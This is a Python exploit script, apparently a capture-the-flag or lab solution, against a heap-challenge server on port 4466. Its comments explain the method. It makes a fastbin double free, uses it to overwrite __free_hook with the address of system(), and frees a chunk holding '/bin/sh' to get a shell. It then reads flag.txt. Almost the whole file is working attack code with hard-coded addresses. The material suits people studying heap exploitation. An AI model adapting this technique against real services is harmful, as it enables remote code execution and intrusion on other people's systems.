import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4466

# We can't overwrite the GOT because the binary has been compiled with full
# RELRO.  We then overwrite the __free_hook in the malloc library. This hook is
# a GNU libc extension to malloc and allows the programmer to intercept all
# calls to free() (there is a similar one for malloc, and more).  The hook
# receives the same pointer passed to the original free(), and this is very
# convenient for us, since we can reuse the same idea from myheap1: we let
# __free_hook point to system() and write '/bin/sh' string at the start of the
# allocated memory, thus obtaining a call to system("/bin/sh"). 

# the free hook is in the malloc-2.7.2.so dynamic library. This time the
# server is running with ASLR disabled, so we can run the server locally
# to find the load address of the library. The offset of the hook inside
# the library can be obtained with 'nm malloc-2.7.2.so | grep __free_hook'
free_hook = 0x7ffff7fc3000 + 0x60d0
# objdump -d myheap1b | grep system@plt
system_plt = 0x401070

s = socket.create_connection((host, port))
# allocate a first key
s.send(b'aA' + b'A'*8)
# delete it two times, creating the loop in the fastbin
s.send(b'dA')
s.send(b'dA')
# create a new key and overwrite 'fd'
s.send(b'aB' + p(free_hook - 16))
# create a second key to copy 'fd' into the fastbin head.
# We also use this key to hold the command that we want to execute
s.send(b'aC' + b'/bin/sh\0')
# create a third key. The key contents will overwrite __free_hook
s.send(b'aD' + p(system_plt))
# now we delete the 'C' key. This will result into system("/bin/sh").
s.send(b'dC')
# now we are talking to a shell. Let it send us the flag.
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(s.recv(500))
